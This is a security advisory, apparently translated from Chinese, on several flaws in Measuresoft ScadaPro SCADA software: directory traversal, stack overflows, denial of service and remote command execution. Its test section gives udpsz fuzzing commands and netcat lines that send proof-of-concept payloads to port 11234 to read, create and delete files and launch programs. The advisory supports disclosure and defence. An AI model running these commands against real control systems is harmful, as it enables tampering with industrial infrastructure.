Multiple security vulnerabilities in Measuresoft ScadaPro

Release date:
Updated on:

Affected Systems:
Measuresoft scada
Description:
--------------------------------------------------------------------------------
Bugtraq id: 49613

ScadaPro is a real-time data capture software for MS Windwos.

Measuresoft ScadaPro has multiple security vulnerabilities. Remote attackers can exploit these vulnerabilities to use directory traversal strings to perform illegal operations or execute arbitrary code or commands, which may cause DOS. Most of the supported commands in the software have Stack Overflow and DoS Vulnerabilities.

 

<* Source: Luigi Auriemma (aluigi@pivx.com)

Link: http://aluigi.altervista.org/adv/scadapro_1-adv.txt
Http://secunia.com/advisories/45973/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Luigi Auriemma (aluigi@pivx.com) provides the following testing methods:

Http://aluigi.org/testz/udpsz.zip

Only a simple example:
Udpsz-d 2-c "xx %"-B a-X 0 16 l 0x6161-T-l 0 SERVER 11234 0x2000
Udpsz-d 2-c "xx % test \ t"-B a-X 0 16 l 0x6161-T-l 0 SERVER 11234 0x2000
Udpsz-d 2-c "xx % test,"-B a-X 0 16 l 0x6161-T-l 0 SERVER 11234 0x2000

Http://aluigi.org/poc/scadapro_1.zip

Nc SERVER 11234 <scadapro_1b.dat; read c: \ boot. ini
Nc SERVER 11234 <scadapro_1c.dat; create c: \ evil_file.txt
Nc SERVER 11234 <scadapro_1d.dat; delete c: \ valid_file.txt
Nc SERVER 11234 <scadapro_1e.dat; execute notepad

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Measuresoft
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.measuresoft.com/products/scada-products.aspx